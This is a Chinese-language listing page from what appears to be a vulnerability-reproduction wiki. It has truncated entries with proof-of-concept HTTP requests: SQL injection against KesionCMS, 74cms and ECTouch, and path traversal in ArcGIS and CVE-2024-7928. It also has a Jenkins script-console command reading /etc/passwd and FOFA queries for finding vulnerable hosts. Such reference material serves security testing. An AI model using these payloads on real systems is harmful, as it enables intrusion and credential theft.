通用之客户管理系统


  • 简介
  • 目录大纲
  • 最新文档

    ND007 jenkins-script

    未授权访问是可以执行任意命令的,如图: println "cat /etc/passwd".execute().text

    myh0st - 2026年3月7日 08:31


    ND001 KesionCMS-ajaxs-sqli

    漏洞复现 ``` GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,password%2520from%20KS_Admin%2500 HTTP/1.1 H……

    myh0st - 2025年9月19日 11:25


    S79 KesionCMS

    ``` fofa 语句:body="publish by kesioncms"||body="/ks_inc/common.js" ```

    myh0st - 2025年9月19日 11:24


    S30 JEEVMS仓库管理系统 - JEEVMS

    fofa ``` fofa 语句:body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"||body="window.location.href = \"loginController.do?login" ``` 合并 https://wiki.xazlsec.com/project-48/doc-6723/

    myh0st - 2025年9月16日 21:44


    ND004 CVE-2024-7928

    漏洞复现 ``` GET /index/ajax/lang?lang=../../application/database HTTP/1.1 Host: n.xazlsec.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.535……

    myh0st - 2025年9月12日 11:01


    ND002 diy-xiaochengxu-doPageGetFormList-sqli

    poc ```javascript POST /api/wxapps/doPageGetFormList HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik……

    myh0st - 2025年9月12日 10:58


    ND001 CVE-2023-39560

    SQL 注入 漏洞复现 ``` GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1 Host: m.xazlsec.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Ge……

    myh0st - 2025年9月11日 12:01


    S78 ECTouch

    商创网络科技 专注移动电商 http://www.ectouch.cn ``` fofa 语句:header="touch_id" ```

    myh0st - 2025年9月11日 12:00


    ND001 ArcGIS-manager-path-traversal

    ArcGIS地理信息系统 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 poc javascript GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ……

    myh0st - 2025年9月9日 16:12


    ND008 74cms-weixin-sqli

    漏洞复现 ``` POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp&nonce HTTP/1.1 Host: www.xazlsec.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) ……

    myh0st - 2025年9月9日 09:16



    myh0st